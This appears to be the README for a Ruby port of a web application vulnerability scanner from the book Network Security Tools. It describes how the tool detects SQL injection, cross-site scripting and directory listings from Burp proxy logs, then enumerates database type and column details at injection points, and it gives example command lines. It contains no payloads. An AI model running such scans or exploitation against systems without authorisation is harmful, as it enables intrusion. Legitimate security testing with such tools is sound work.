Synopsis

This is a Ruby port of the Perl version of Extended Scanner presented in Ch 9 of Network Security Tools by Justin Clarke et al. Refer to www.oreilly.com/catalog/networkst/ for the sample chapter and perl source code. The book is definitely worth a read for any serious security professional.

The scanner is capable of parsing a Burp log file (Refer to portswigger.net/proxy/) and discovering the following web application vulnerabilities:

 1. SQL Injection
 2. Cross Site Scripting
 3. Directory Listings

The extended scanner has intelligent capabilities to perform enumeration and exploits on discovered sql injection points. The following information is enumerated:

 1. Valid SQL injection (i.e., not a false positive)
 2. Backend database type (currently supports MS SQL, Oracle and MySQL)
 3. Number of columns at the injection points table
 4. Data type of each column identified

Has the capability of operating through an HTTP proxy tunnel and sending a static cookie.

Original Code

Copyright (c) 2005 O‘Reilly Media, Inc. All rights reserved.<br> Network Security Tools By Justin Clarke, Nitesh Dhanjani <br> Note: The original code and chapter was authored by Brian Holyfield

New Code

Copyright (c) 2007 by Security Technology Science Pty Ltd. All rights reserved.

License

Licensed under the same terms as GNU GPL v2. Refer to LICENSE in the downloaded package.

Example

Using a static cookie

 ruby extendedscanner.rb --cookie "cid=1234; secure" --log burplog.txt https://www.example.com:443

Using a proxy to tunnel requests

 ruby extendedscanner.rb --proxy_ip 127.0.0.1 --proxy_port 8080 --log burplog.txt http://www.example.com:80

Required files